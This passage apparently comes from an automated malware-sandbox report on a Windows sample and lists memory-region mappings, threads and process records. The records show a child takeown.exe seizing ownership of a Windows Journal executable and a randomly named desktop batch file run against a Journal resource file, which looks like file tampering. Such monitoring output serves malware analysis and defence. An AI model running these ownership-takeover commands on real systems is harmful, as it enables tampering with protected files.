Region: id = 7710 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7711 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7712 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7713 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7714 start_va = 0x6ef5490000 end_va = 0x6ef5617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5490000" filename = "" Region: id = 7715 start_va = 0x6ef5620000 end_va = 0x6ef57a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5620000" filename = "" Region: id = 7716 start_va = 0x6ef57b0000 end_va = 0x6ef6baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef57b0000" filename = "" Region: id = 7717 start_va = 0x6ef5100000 end_va = 0x6ef5100fff entry_point = 0x0 region_type = private name = "private_0x0000006ef5100000" filename = "" Region: id = 7718 start_va = 0x6ef5110000 end_va = 0x6ef5110fff entry_point = 0x0 region_type = private name = "private_0x0000006ef5110000" filename = "" Region: id = 7719 start_va = 0x6ef5300000 end_va = 0x6ef533ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5300000" filename = "" Region: id = 7720 start_va = 0x6ef5480000 end_va = 0x6ef548ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5480000" filename = "" Region: id = 7722 start_va = 0x6ef5340000 end_va = 0x6ef537ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5340000" filename = "" Region: id = 7723 start_va = 0x7ff7fd3ba000 end_va = 0x7ff7fd3bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd3ba000" filename = "" Region: id = 7724 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7725 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 7726 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7727 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7728 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 7729 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 7730 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 7731 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7732 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7733 start_va = 0x6ef5380000 end_va = 0x6ef53bffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5380000" filename = "" Region: id = 7795 start_va = 0x6ef6bb0000 end_va = 0x6ef6ee6fff entry_point = 0x6ef6bb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7796 start_va = 0x6ef5060000 end_va = 0x6ef5080fff entry_point = 0x6ef5060000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 7797 start_va = 0x6ef53c0000 end_va = 0x6ef5418fff entry_point = 0x6ef53c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7798 start_va = 0x6ef6ef0000 end_va = 0x6ef7103fff entry_point = 0x0 region_type = private name = "private_0x0000006ef6ef0000" filename = "" Region: id = 7799 start_va = 0x6ef7110000 end_va = 0x6ef7326fff entry_point = 0x0 region_type = private name = "private_0x0000006ef7110000" filename = "" Region: id = 7805 start_va = 0x6ef7330000 end_va = 0x6ef743bfff entry_point = 0x0 region_type = private name = "private_0x0000006ef7330000" filename = "" Region: id = 7806 start_va = 0x6ef7440000 end_va = 0x6ef765bfff entry_point = 0x0 region_type = private name = "private_0x0000006ef7440000" filename = "" Region: id = 7807 start_va = 0x6ef7660000 end_va = 0x6ef776efff entry_point = 0x0 region_type = private name = "private_0x0000006ef7660000" filename = "" Region: id = 7879 start_va = 0x6ef5060000 end_va = 0x6ef509ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5060000" filename = "" Region: id = 7880 start_va = 0x6ef5120000 end_va = 0x6ef5120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5120000" filename = "" Region: id = 7881 start_va = 0x7ff7fd3be000 end_va = 0x7ff7fd3bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd3be000" filename = "" Region: id = 7882 start_va = 0x6ef53c0000 end_va = 0x6ef5477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef53c0000" filename = "" Region: id = 7883 start_va = 0x6ef5120000 end_va = 0x6ef5123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5120000" filename = "" Region: id = 7884 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7885 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 7886 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 7887 start_va = 0x6ef5130000 end_va = 0x6ef5136fff entry_point = 0x0 region_type = private name = "private_0x0000006ef5130000" filename = "" Region: id = 7888 start_va = 0x6ef5300000 end_va = 0x6ef5304fff entry_point = 0x6ef5300000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 7889 start_va = 0x6ef5330000 end_va = 0x6ef533ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5330000" filename = "" Region: id = 7890 start_va = 0x6ef5310000 end_va = 0x6ef5310fff entry_point = 0x6ef5310000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 7891 start_va = 0x6ef5320000 end_va = 0x6ef5321fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5320000" filename = "" Region: id = 7892 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 7893 start_va = 0x6ef5380000 end_va = 0x6ef5380fff entry_point = 0x6ef5380000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 7894 start_va = 0x6ef53b0000 end_va = 0x6ef53bffff entry_point = 0x0 region_type = private name = "private_0x0000006ef53b0000" filename = "" Region: id = 7895 start_va = 0x6ef5390000 end_va = 0x6ef5391fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5390000" filename = "" Region: id = 7896 start_va = 0x6ef5380000 end_va = 0x6ef5380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5380000" filename = "" Thread: id = 899 os_tid = 0xf38 Thread: id = 900 os_tid = 0xe7c Thread: id = 901 os_tid = 0xf98 Thread: id = 906 os_tid = 0x2d0 Process: id = "108" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0xd6f000" os_pid = "0x71c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0xeac" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Journal.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7808 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 7809 start_va = 0x9f0000 end_va = 0x49effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 7810 start_va = 0x49f0000 end_va = 0x4a0ffff entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 7811 start_va = 0x4a10000 end_va = 0x4a11fff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 7812 start_va = 0x4a20000 end_va = 0x4a33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 7813 start_va = 0x4a40000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 7814 start_va = 0x4a80000 end_va = 0x4abffff entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 7815 start_va = 0x4ac0000 end_va = 0x4ac3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ac0000" filename = "" Region: id = 7816 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7817 start_va = 0x7eac0000 end_va = 0x7eae2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eac0000" filename = "" Region: id = 7818 start_va = 0x7eaeb000 end_va = 0x7eaebfff entry_point = 0x0 region_type = private name = "private_0x000000007eaeb000" filename = "" Region: id = 7819 start_va = 0x7eaec000 end_va = 0x7eaeefff entry_point = 0x0 region_type = private name = "private_0x000000007eaec000" filename = "" Region: id = 7820 start_va = 0x7eaef000 end_va = 0x7eaeffff entry_point = 0x0 region_type = private name = "private_0x000000007eaef000" filename = "" Region: id = 7821 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7822 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7823 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7824 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7825 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7826 start_va = 0x4ad0000 end_va = 0x4ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 7827 start_va = 0x4ae0000 end_va = 0x4ae1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 7855 start_va = 0x4b40000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 7856 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7857 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7858 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7859 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7860 start_va = 0x4b50000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 7861 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7862 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7863 start_va = 0x49f0000 end_va = 0x49fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 7864 start_va = 0x7e9c0000 end_va = 0x7eabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9c0000" filename = "" Region: id = 7935 start_va = 0x4cf0000 end_va = 0x4dadfff entry_point = 0x4cf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7936 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7937 start_va = 0x4af0000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 7938 start_va = 0x4b50000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 7939 start_va = 0x4bf0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 7940 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7941 start_va = 0x7eae8000 end_va = 0x7eaeafff entry_point = 0x0 region_type = private name = "private_0x000000007eae8000" filename = "" Region: id = 7942 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7943 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7944 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7945 start_va = 0x4a00000 end_va = 0x4a03fff entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 7946 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7947 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7948 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7950 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7951 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7952 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7953 start_va = 0x4db0000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 7954 start_va = 0x4b90000 end_va = 0x4bb9fff entry_point = 0x4b90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7955 start_va = 0x4e20000 end_va = 0x4fa7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e20000" filename = "" Region: id = 7956 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7957 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7958 start_va = 0x4a10000 end_va = 0x4a14fff entry_point = 0x4a10000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 7959 start_va = 0x4fb0000 end_va = 0x5130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fb0000" filename = "" Region: id = 7960 start_va = 0x5140000 end_va = 0x653ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005140000" filename = "" Region: id = 7961 start_va = 0x4b30000 end_va = 0x4b30fff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 7962 start_va = 0x4b90000 end_va = 0x4b90fff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 8009 start_va = 0x6540000 end_va = 0x6876fff entry_point = 0x6540000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8010 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8011 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 904 os_tid = 0x5b0 Thread: id = 910 os_tid = 0x278 Process: id = "109" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x29ec1000" os_pid = "0xdfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7897 start_va = 0x880000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 7898 start_va = 0x8a0000 end_va = 0x8a1fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 7899 start_va = 0x8b0000 end_va = 0x8c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 7900 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 7901 start_va = 0x910000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 7902 start_va = 0xa10000 end_va = 0xa13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 7903 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7904 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 7905 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7906 start_va = 0x7f290000 end_va = 0x7f2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f290000" filename = "" Region: id = 7907 start_va = 0x7f2b7000 end_va = 0x7f2b7fff entry_point = 0x0 region_type = private name = "private_0x000000007f2b7000" filename = "" Region: id = 7908 start_va = 0x7f2bb000 end_va = 0x7f2bdfff entry_point = 0x0 region_type = private name = "private_0x000000007f2bb000" filename = "" Region: id = 7909 start_va = 0x7f2be000 end_va = 0x7f2befff entry_point = 0x0 region_type = private name = "private_0x000000007f2be000" filename = "" Region: id = 7910 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7911 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7912 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7913 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7914 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7915 start_va = 0xa20000 end_va = 0xa20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 7916 start_va = 0xa30000 end_va = 0xa31fff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 7917 start_va = 0xc10000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 7918 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7919 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7920 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7921 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7922 start_va = 0xc20000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 7923 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7924 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7925 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 7926 start_va = 0x7f190000 end_va = 0x7f28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f190000" filename = "" Region: id = 8051 start_va = 0xa40000 end_va = 0xafdfff entry_point = 0xa40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8052 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8053 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 8054 start_va = 0xc20000 end_va = 